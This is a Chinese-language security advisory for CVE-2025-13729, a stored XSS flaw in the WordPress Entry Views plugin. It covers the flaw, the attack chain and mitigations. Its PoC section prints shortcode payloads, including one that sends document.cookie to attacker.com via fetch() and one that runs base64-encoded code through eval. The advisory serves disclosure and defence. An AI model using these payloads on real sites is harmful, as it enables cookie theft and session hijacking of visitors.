CVE-2025-13729 CVSS 6.4 中危

CVE-2025-13729 WordPress Entry Views插件存储型XSS漏洞

披露日期: 2026-01-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13729

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Entry Views插件

漏洞概述

CVE-2025-13729是WordPress Entry Views插件中的一个存储型跨站脚本（Stored XSS）漏洞。该插件是一款用于统计文章浏览量的WordPress插件，在1.0.0及之前的所有版本中存在严重的安全问题。漏洞的根本原因在于插件的'entry-views'短代码功能对用户提供的属性参数缺乏充分的输入清理和输出转义处理。攻击者通过利用此漏洞，可以在具有贡献者（contributor）级别权限的情况下，向WordPress页面或文章中注入任意JavaScript脚本代码。由于漏洞属于存储型XSS，恶意代码会被永久保存在服务器端，所有访问被感染页面的用户都会自动执行攻击者植入的恶意脚本，从而可能导致会话劫持、敏感信息窃取、恶意重定向等严重安全后果。

技术细节

漏洞存在于Entry Views插件的shortcodes.php文件中，具体位置在第25行和第36行的短代码处理逻辑中。插件在处理'entry-views'短代码时，直接将用户提供的属性参数输出到HTML页面而未进行适当的转义处理。攻击者可以通过构造包含恶意JavaScript代码的属性值（如onerror、onload等事件处理器），实现存储型XSS攻击。由于WordPress的短代码机制允许具有贡献者权限的用户在文章内容中插入短代码，攻击门槛相对较低。一旦恶意代码被注入，所有访问该页面的用户都会在浏览器中执行这些脚本，攻击者可借此窃取用户的认证Cookie、劫持用户会话或进行钓鱼攻击。

攻击链分析

STEP 1

步骤1

攻击者获得WordPress网站的用户账户，需要至少具备贡献者（contributor）级别权限

STEP 2

步骤2

攻击者创建或编辑文章/页面，在内容中插入包含恶意JavaScript代码的'entry-views'短代码

STEP 3

步骤3

由于插件缺乏输入验证和输出转义，恶意代码被存储到数据库中

STEP 4

步骤4

管理员或其他用户访问包含恶意短代码的页面

STEP 5

步骤5

用户浏览器执行注入的恶意JavaScript代码，导致Cookie窃取、会话劫持或重定向到钓鱼网站

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress Entry Views Plugin XSS PoC -->
<!-- Author: Contributor+ Role Required -->
<!-- Target: Entry Views Plugin <= 1.0.0 -->

<!-- PoC 1: Basic XSS via entry-views shortcode -->
[entry-views onerror='alert(String.fromCharCode(88,83,83))' onload='alert(document.cookie)']

<!-- PoC 2: Cookie Stealing Payload -->
[entry-views id='xss' onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"]

<!-- PoC 3: Session Hijacking -->
[entry-views foo='bar' onmouseover='eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))']

影响范围

Entry Views插件 <= 1.0.0

防御指南

临时缓解措施

如果无法立即更新插件，建议临时禁用'entry-views'短代码功能，或限制贡献者角色的文章发布权限。同时可以在WAF（Web应用防火墙）中添加针对短代码参数的XSS过滤规则，防止恶意代码的注入和执行。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表